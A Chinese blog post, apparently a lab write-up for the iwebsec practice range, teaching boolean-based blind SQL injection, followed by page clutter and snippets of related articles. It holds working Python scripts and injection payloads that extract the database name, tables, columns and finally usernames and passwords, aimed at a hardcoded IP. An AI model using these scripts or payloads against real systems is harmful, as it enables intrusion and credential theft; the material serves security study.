SQL注入漏洞 | bool型

最新推荐文章于 2023-09-22 22:13:26 发布
最新推荐文章于 2023-09-22 22:13:26 发布
阅读量649 收藏 3
点赞数 2
分类专栏: web安全 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/128081484
版权

文章目录

前言

MySQL bool型

  1. 随便试试看回显
    在这里插入图片描述

    在这里插入图片描述

  2. bool注入原理

    我们可以利用回显内容来猜测数据库的内容和信息。
    比如,我们猜测数据库名的长度,length(database())=3。如果数据库名长度真的是3,则length(database())=3这个表达式是真的,则为1;如果数据库名长度不为3,则length(database())=3这个表达式是假的,则为0。因此我们只需要看数据库的回显反应即可,如果回显了,说明我们猜对了,如果不回显则说明我们猜错了。

    在这里插入图片描述
    一个个试,到7就回显了,说明我们猜数据库长度为7是对的。
    在这里插入图片描述

  3. 一个个试太麻烦,我们可以编写脚本帮我们做重复性的东西。

    import requests

url = "http://8.134.148.36:8001/sqli/03.php"


def DBlen():
    for i in range(20):
        payload = url + "?id=1 and length(database())={}".format(i)
        response = requests.get(url=payload)
        if "welcome to iwebsec!!!" in response.text:
            print("数据名长度为", i)

DBlen()

    在这里插入图片描述

  4. MID() 函数

    用于从文本字段中提取字符。
    在这里插入图片描述

    ord() 函数

    以一个字符(长度为1的字符串)作为参数,返回对应的 ASCII 数值。
    在这里插入图片描述

  5. 我们继续猜数据库名,一位位地猜。猜数据名的第1位为a,将a转成ASCII码为97,则ord(mid((select database()),1,1))=97
    在这里插入图片描述

    继续猜 ord(mid((select database()),1,1))=105
    在这里插入图片描述
    第一位猜出来了,接着猜第二位是啥。人工试太慢了,我们继续写脚本。

    # 利用二分法
def DBname():
    result = ""
    for i in range(20):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and ord(mid((select database()),{},1))>{}".format(i, mid)
            response = requests.get(url=payload)
            if "welcome to iwebsec!!!" in response.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名为", result)

    在这里插入图片描述

  6. 接下来猜iwebsec数据库的表名。
    ord(mid((select database()),1,1))=97中的database换成表名group_concat(table_name) from information_schema.tables where table_schema=database()
    即为ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=95
    在这里插入图片描述
    猜出一位
    在这里插入图片描述
    还是继续用脚本吧

    def DBtable():
    result = ""
    for i in range(30):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}".format(
                i, mid)
            response = requests.get(url=payload)
            if "welcome to iwebsec!!!" in response.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名的表名为", result)

    在这里插入图片描述

  7. 继续测列名。
    ord(mid((select database()),1,1))=97中的database换成列名group_concat(column_name) from information_schema.columns where table_name=user
    即为ord(mid((select group_concat(column_name) from information_schema.columns where table_name='user'),1,1))=97

    在这里插入图片描述
    继续上脚本

    def DBcolumn():
    result = ""
    for i in range(30):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and ord(mid((select group_concat(column_name) from information_schema.columns where table_name='user'),{},1))>{}".format(
                i, mid)
            response = requests.get(url=payload)
            if "welcome to iwebsec!!!" in response.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名的表的列为", result)

    在这里插入图片描述

  8. 最后猜一下每个列的值
    ord(mid((select database()),1,1))=97中的database换成字段group_concat(id,'--',username,'--',password,'--') from user
    即为 ord(mid((select group_concat(id,'--',username,'--',password,'--') from user),1,1))=97
    在这里插入图片描述
    继续上脚本

    def Getdata():
    result = ""
    for i in range(100):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = url + "?id=1 and ord(mid((select group_concat(id,'--',username,'--',password,'--') from user),{},1))>{}".format(i, mid)
            response = requests.get(url=payload)
            if "welcome to iwebsec!!!" in response.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("数据库名的表的列为", result)

    在这里插入图片描述

  9. 总脚本

    https://pan.baidu.com/s/1VxBWd_vk4-faOv5J6PUVdA?pwd=xxxi
c4fx
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
综合bool盲注脚本.py
07-15
可以适用于部分SQL注入题目
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔盲注)
mooyuan的博客
11-26 2449
iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔注入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入
lifeng_dc的博客
01-22 1094
一、解题过程 (一)观察payload与结果 1.SQL执行有结果,就输出welcome to iwebsec!!! 2.否则输出1 (二)编写脚本逐项获取信息 1.获取数据库名字符串长度 先要为python安装requests包 pip install requests python代码如下: #encoding=utf-8 import requests import os url="http://192.168.182.130:8001/sqli/03.php" def DbLen():
SQL注入之布尔式(boolean)注入
最新发布
2301_79299101的博客
09-22 300
输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输入 vince'and'1'='1。再输入 vince'and'1'='2。2,判断是数字式还是字符。3,判断数据库有多少个字段。
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6064
Less-7导出文件GET字符注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
浅谈sql盲注(bool和时间)和二次注入 宽字节 cookie
qq_63548648的博客
12-06 426
个人的总结
SQL注入Bool盲注(510cms)
qq_45775897的博客
01-05 2865
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符。反之是数值 eg: http://IP地址(域名)/news.php?cid=&
SQL注入漏洞之布尔(Boolean)注入
m0_71109835的博客
02-01 1092
其一,前端传到后端的数据内容是用户可以控制的,如果这些数据不是用户可以控制的话SQL注入漏洞就无从谈起。其二:用户输入的参数可以拼接的SQL语句中,并且可以被执行。:SQL注入之所以得以存在主要是因为WEB应用程序对用户输入的数据没有进行有效的判断和过滤,从而导致用户的恶意SQL语句从前端传到后端,最后实现了对数据的窃取和破环。学习SQL注入首先要对一些常见的SQL语法有一定的了解,这样我们在使用SQL注入漏洞攻击对方时才能游刃有余。5.在得知数据库名字长度后,我们可以用穷举的方法猜测出数据库的名字。
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。二、函数是否安全接下来...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP...超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
bool_injection
02-13
布尔注入 考点 bool注入,通过页面返回的结果判断是否存在注入 启动 通过docker-compose启动 docker-compose up -d open http://127.0.0.1:8304 通过docker run启动 docker run -d -P print1n/bool_injection 版权 如果名义,请联系作者删除( )
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入 支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
ASP.NET防止SQL注入的方法示例
01-20
最近接手别人一个项目,发现存在SQL注入漏洞,因为不想改太多代码,所以那种参数法防注入呢我就用不着了。只能用传统的笨一点的办法了。 1、新建Global.asax文件。 2、加入如下代码: void Application_...
超级SQL注入工具
04-08
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SQL 布尔注入的原理与注入攻击
chen_zhangkonzhe的博客
09-12 1351
布尔注入,一般在测试中不会在页面显示数据库信息,只会提示对与错的内容。代码的过程:get接收id参数-》id带入查询-》如果存在值返回id exists字符串信息。例如:在某个系统登录页面输入账号密码时提示对与错,要是存在注入就是SQL注入,盲注入有两种方式:一种是布尔注入,另外一种是延时注入
[转载]sql 盲注之正则表达式攻击
weixin_34396902的博客
07-29 224
-----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli...
SQL注入-布尔盲注
qq_65240014的博客
07-26 465
关于sql注入的略微进阶一点的文章,介绍关于bool盲注的方法
sql注入练习之bool盲注
windStudyer的专栏
05-22 1107
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
bool注入
qq_46540840的博客
03-14 784
sql注入-布尔盲注 以buuctf上的题具体来说 题目链接 方法一:布尔注入 方法二:报错注入 解题: 首先查看源代码:可以得到提示:得到一种思路:报错注入 这里拿布尔注入具体来说: 首先拿Bp判断: 输入name=admin &pass=1时:urldecode解码得到密码错误 name=1’or 1=1 # &pass=1 得到与1相同结果 name=1’or 1=2 # &pass=1得到是字符注入 解释: 第一句是admin用户名是对的,密码不对 和第二局相对照 :
| | _Bool
06-09
_Bool是C99标准中新增的一种基本数据类,它只有两个取值,即0和1,分别代表false和true。_Bool可以直接进行逻辑运算,例如与(&&)、或(||)、非(!)等运算。 在C语言中,_Bool可以通过以下方式进行定义: ```c _Bool bool_var; // 使用_Bool关键字定义_Bool的变量 ``` 需要注意的是,在C语言中,_Bool的变量只占用1个字节的存储空间,因此它的取值只能是0或1,不能是其他的整数值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值